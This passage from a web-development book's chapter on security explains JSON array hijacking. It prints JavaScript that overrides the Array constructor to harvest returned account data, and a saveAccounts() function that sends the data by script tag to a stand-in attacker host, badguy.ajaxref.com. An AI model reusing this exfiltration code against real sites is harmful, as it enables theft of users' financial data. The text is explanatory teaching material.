PART II
Chapter 7: Security Concerns 325
This might not seem so bad since the JSON array is just a literal and the intruder would
have no easy way to reference the sensitive data. But not so fast—via JavaScript they could,
in fact, reference the data by overriding the core features of an Array object that get and set
values. This literal value is still legal JavaScript so the type still needs to be instantiated.
What you see in the following code is the values being copied and then sent to
saveAccounts().function Array()
{
var obj = this;
var ind = 0;
var getNext = function(arrayItem)
{
obj[ind++] setter = getNext;
if (arrayItem)
{
if (typeof(arrayItem) == "object")
{
var data = "";
for (var i in arrayItem)
data += i + ": " + arrayItem[i] + " ";
saveAccounts(data);
}
}
};
this[ind++] setter = getNext;
}The function saveAccounts() then uses traditional JavaScript mechanisms to transmit
the stolen data to some third site as shown in the following code:function saveAccounts(payload)
{
var url = "http://badguy.ajaxref.com/ch7/saveaccounts.php?accounts=" + payload;
var scr = document.createElement("script");
scr.src = url;
document.body.appendChild(scr);
}To see this kind of attack in action, visit the online example at http://ajaxref.com/ch7/
jsonarray.php that is also shown in Figure 7-14.
This particular method will even work if the bank site has been using SSL. Remember,
the user’s browser with the trust relationship is making the request for the hacker.
Before you go dumping JSON as a data format, however, read on to get the full picture
and then we’ll see how we might address these concerns quite easily. Before that, we start
with some good news: as of this book’s writing, it appears it is not possible to steal an object
response. So if the payload had been sent back like so:{"accountNumber":"1174674826","ssn":"111-22-3333","name":"Malcolm Reynolds"}